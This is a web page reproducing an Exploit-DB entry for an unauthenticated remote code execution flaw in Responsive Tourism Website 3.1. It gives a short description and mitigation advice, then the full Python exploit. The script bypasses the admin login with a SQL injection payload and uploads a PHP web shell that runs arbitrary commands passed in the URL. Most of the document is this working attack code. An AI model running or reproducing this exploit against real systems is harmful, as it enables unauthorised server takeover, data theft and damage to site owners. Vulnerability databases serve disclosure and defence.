header-logo
Suggest Exploit
vendor:
Responsive Tourism Website
by:
Tagoletta (Tağmaç)
9,8
CVSS
HIGH
Remote Code Execution (RCE)
89
CWE
Product Name: Responsive Tourism Website
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MacOS & Windows
2021

Responsive Tourism Website 3.1 – Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to gain remote code execution on a vulnerable Responsive Tourism Website 3.1. The attacker can bypass the login page by using a SQL injection payload and then upload a malicious PHP shell to the server. The attacker can then access the shell via the URL and execute arbitrary commands on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, ensure that the web application is running the latest version of the software and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 22.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html
# Version: V 3.1
# Tested on: MacOS & Windows

import requests
import random
import string
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"


session = requests.Session()
session.get(url + 'admin/login.php')

print("- Bypassing login -")

login_url = url + "classes/Login.php?f=login"
login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"}
session.post(login_url, cookies=session.cookies.get_dict(), data=login_data)

print("- Protecting User -")

protectSettings_url = url + 'admin/?page=user'
protectSetting_html = session.get(protectSettings_url)
protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser')

ids = protectSettings_parser.find('input', {'name':'id'}).get("value")
firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value")
lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value")
username = protectSettings_parser.find('input', {'id':'username'}).get("value")

print("User ID : " + ids)
print("First Name : " + firstname)
print("Last Name : " + lastname)
print("Username : " + username)

print("- OK -")

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

print("Shell uploading")

upload_url = url + "classes/Users.php?f=save"
upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n"
upload = session.post(upload_url, headers=upload_headers, data=upload_data)

if upload.status_code == 200:
    print("- OK -")
    req = session.get(url + "/admin/?page=user", headers=session.headers)
    parser = BeautifulSoup(req.text, 'html.parser')
    find_shell = parser.find('img', {'id':'cimg'})
    print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
    print("- NO :( -")

Navigation

Suggest Exploit

Services By CQR